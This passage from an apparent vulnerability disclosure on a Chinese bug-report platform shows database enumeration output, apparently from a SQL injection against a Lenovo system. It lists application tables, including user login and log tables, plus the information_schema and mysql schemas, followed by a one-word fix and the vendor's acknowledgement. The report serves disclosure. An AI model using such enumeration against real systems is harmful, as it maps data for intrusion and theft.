| exp_unsatisfy_statistic |
| exp_user_goout |
| exp_user_oper |
| exp_weibo_accesstoken |
| exp_zip_district_phonecode |
| faq_detail_tools |
| gongju_chajian |
| kb_biz_tpl |
| kb_biz_tpl_attr |
| kb_biz_tpl_cat |
| kb_biz_tpl_cfg |
| kb_biz_tpl_cfg_attr |
| kb_biz_tpl_rdr |
| kb_cate_class |
| kb_category |
| kb_category_tag |
| kb_dim_val |
| kb_dim_val_tag |
| kb_faq |
| kb_faq_sample |
| kb_obj__obj |
| kb_obj_class |
| kb_object |
| kb_val |
| kb_wordclass |
| kb_wordclass_category |
| kb_wordclass_word |
| login_user_info |
| login_user_info_copy |
| login_user_qa |
| mat_app |
| mat_app_category |
| mat_img_mark |
| mat_material_idx |
| mat_material_tag |
| mat_material_tag_relate |
| mkt_advertise_item |
| mkt_advertise_suite |
| mkt_hot_question |
| mkt_notice |
| mkt_sign_activity |
| mkt_user_attribute |
| mkt_vote |
| mkt_vote_item |
| mkt_vote_record |
| om_feedback |
| om_instruction_rank_day |
| om_instruction_rank_month |
| om_leave_message |
| om_log_acs_detail_201308 |
| om_log_acs_detail_201309 |
| om_log_acs_detail_201310 |
| om_log_acs_detail_201311 |
| om_log_acs_detail_201312 |
| om_log_acs_detail_201401 |
| om_log_acs_detail_201402 |
| om_log_acs_detail_201403 |
| om_log_acs_detail_201404 |
| om_log_acs_detail_201405 |
| om_log_acs_detail_201406 |
| om_log_acs_detail_201407 |
| om_log_acs_detail_201408 |
| om_log_acs_detail_201409 |
| om_log_acs_detail_201410 |
| om_log_acs_detail_201411 |
| om_log_acs_detail_201412 |
| om_log_acs_detail_201501 |
| om_log_acs_detail_201502 |
| om_log_acs_detail_201503 |
| om_log_acs_detail_201504 |
| om_log_acs_detail_201505 |
| om_log_acs_detail_201506 |
| om_log_acs_detail_201507 |
| om_log_acs_detail_201508 |
| om_log_acs_detail_201509 |
| om_log_acs_detail_201510 |
| om_log_acs_detail_201511 |
| om_log_acs_detail_201512 |
| om_log_acs_detail_201601 |
| om_log_ask_detail_201308 |
| om_log_ask_detail_201309 |
| om_log_ask_detail_201310 |
| om_log_ask_detail_201311 |
| om_log_ask_detail_201312 |
| om_log_ask_detail_201401 |
| om_log_ask_detail_201402 |
| om_log_ask_detail_201403 |
| om_log_ask_detail_201404 |
| om_log_ask_detail_201405 |
| om_log_ask_detail_201406 |
| om_log_ask_detail_201407 |
| om_log_ask_detail_201408 |
| om_log_ask_detail_201409 |
| om_log_ask_detail_201410 |
| om_log_ask_detail_201411 |
| om_log_ask_detail_201412 |
| om_log_ask_detail_201501 |
| om_log_ask_detail_201502 |
| om_log_ask_detail_201503 |
| om_log_ask_detail_201504 |
| om_log_ask_detail_201505 |
| om_log_ask_detail_201506 |
| om_log_ask_detail_201507 |
| om_log_ask_detail_201508 |
| om_log_ask_detail_201509 |
| om_log_ask_detail_201510 |
| om_log_ask_detail_201511 |
| om_log_ask_detail_201512 |
| om_log_ask_detail_201601 |
| om_log_aud |
| om_log_bookmark |
| om_log_cache |
| om_log_faq_vote |
| om_log_imgtxt |
| om_log_nick_collect |
| om_log_service_detail_201308 |
| om_log_service_detail_201309 |
| om_log_service_detail_201310 |
| om_log_service_detail_201311 |
| om_log_service_detail_201312 |
| om_log_service_detail_201401 |
| om_log_service_detail_201402 |
| om_log_service_detail_201403 |
| om_log_service_detail_201404 |
| om_log_service_detail_201405 |
| om_log_service_detail_201406 |
| om_log_service_detail_201407 |
| om_log_service_detail_201408 |
| om_log_service_detail_201409 |
| om_log_service_detail_201410 |
| om_log_service_detail_201411 |
| om_log_service_detail_201412 |
| om_log_service_detail_201501 |
| om_log_service_detail_201502 |
| om_log_service_detail_201503 |
| om_log_service_detail_201504 |
| om_log_service_detail_201505 |
| om_log_service_detail_201506 |
| om_log_service_detail_201507 |
| om_log_service_detail_201508 |
| om_log_service_detail_201509 |
| om_log_service_detail_201510 |
| om_log_service_detail_201511 |
| om_log_service_detail_201512 |
| om_log_service_detail_201601 |
| om_log_session_201308 |
| om_log_session_201309 |
| om_log_session_201310 |
| om_log_session_201311 |
| om_log_session_201312 |
| om_log_session_201401 |
| om_log_session_201402 |
| om_log_session_201403 |
| om_log_session_201404 |
| om_log_session_201405 |
| om_log_session_201406 |
| om_log_session_201407 |
| om_log_session_201408 |
| om_log_session_201409 |
| om_log_session_201410 |
| om_log_session_201411 |
| om_log_session_201412 |
| om_log_session_201501 |
| om_log_session_201502 |
| om_log_session_201503 |
| om_log_session_201504 |
| om_log_session_201505 |
| om_log_session_201506 |
| om_log_session_201507 |
| om_log_session_201508 |
| om_log_session_201509 |
| om_log_session_201510 |
| om_log_session_201511 |
| om_log_session_201512 |
| om_log_session_201601 |
| om_log_system |
| om_log_user_login |
| om_report_template |
| om_unresolved_ques_day |
| om_unresolved_ques_month |
| option_info |
| pub_kb_attribute |
| pub_kb_attribute__attribute |
| pub_kb_baseword |
| pub_kb_cate_class |
| pub_kb_category |
| pub_kb_category_tag |
| pub_kb_class |
| pub_kb_cmchat_faq |
| pub_kb_dim |
| pub_kb_dim_tag |
| pub_kb_dim_val |
| pub_kb_dim_val_tag |
| pub_kb_faq |
| pub_kb_faq_sample |
| pub_kb_ignored_dyn_group |
| pub_kb_instruction |
| pub_kb_instruction_param |
| pub_kb_obj__obj |
| pub_kb_obj_class |
| pub_kb_object |
| pub_kb_participle |
| pub_kb_presuffix |
| pub_kb_rule |
| pub_kb_rule_sample |
| pub_kb_stopword |
| pub_kb_sysword_op |
| pub_kb_val |
| pub_kb_wordclass |
| pub_kb_wordclass_category |
| pub_kb_wordclass_word |
| push_history_0 |
| push_history_1 |
| push_history_2 |
| push_history_3 |
| push_history_4 |
| push_history_5 |
| push_history_6 |
| push_history_7 |
| push_history_8 |
| push_history_9 |
| push_message |
| push_specified |
| question_info |
| questionnaire_info |
| questionnaire_user_info |
| ra_file |
| ra_file__object |
| ra_physical_file |
| rep_evaluation_day |
| rep_evaluation_hour |
| rep_evaluation_month |
| rep_faq_ranking_day |
| rep_faq_ranking_month |
| rep_logon_day |
| rep_survey_day |
| rep_survey_hour |
| rep_survey_month |
| rep_visit_hour |
| rep_visit_month |
| rm_blacklist |
| rm_emotion |
| rm_file_resource |
| rm_menuitem |
| rm_message_resource |
| rm_msgres_dimtag |
| rm_preference |
| rm_robot_account |
| rm_robot_friend_0 |
| rm_robot_friend_1 |
| rm_robot_friend_2 |
| rm_robot_friend_3 |
| rm_robot_friend_4 |
| rm_robot_friend_5 |
| rm_robot_friend_6 |
| rm_robot_friend_7 |
| rm_robot_friend_8 |
| rm_robot_friend_9 |
| rm_robot_friend_group |
| rm_robot_info |
| rm_simple_dialog |
| rm_welcome_resource |
| robot_cat |
| robotcat_knowledge |
| robotcat_result |
| rs_assist_word |
| rs_dict |
| rs_dict_item |
| rs_recog_result |
| rs_sample_category |
| rs_sample_item |
| rs_scenario |
| rs_scenario_tag |
| rs_sentence |
| rs_sentence_category |
| rs_voice_sample |
| rs_word |
| rs_wordclass_category |
| sys_notification |
| sys_temp_fbt |
| temp_word_import |
| tool_question_info |
| user_detail_info |
| view_robot_friend |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 乐乐@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-06 11:28

厂商回复:

感谢您对联想安全的关注!

最新状态:

暂无


漏洞评价:

评价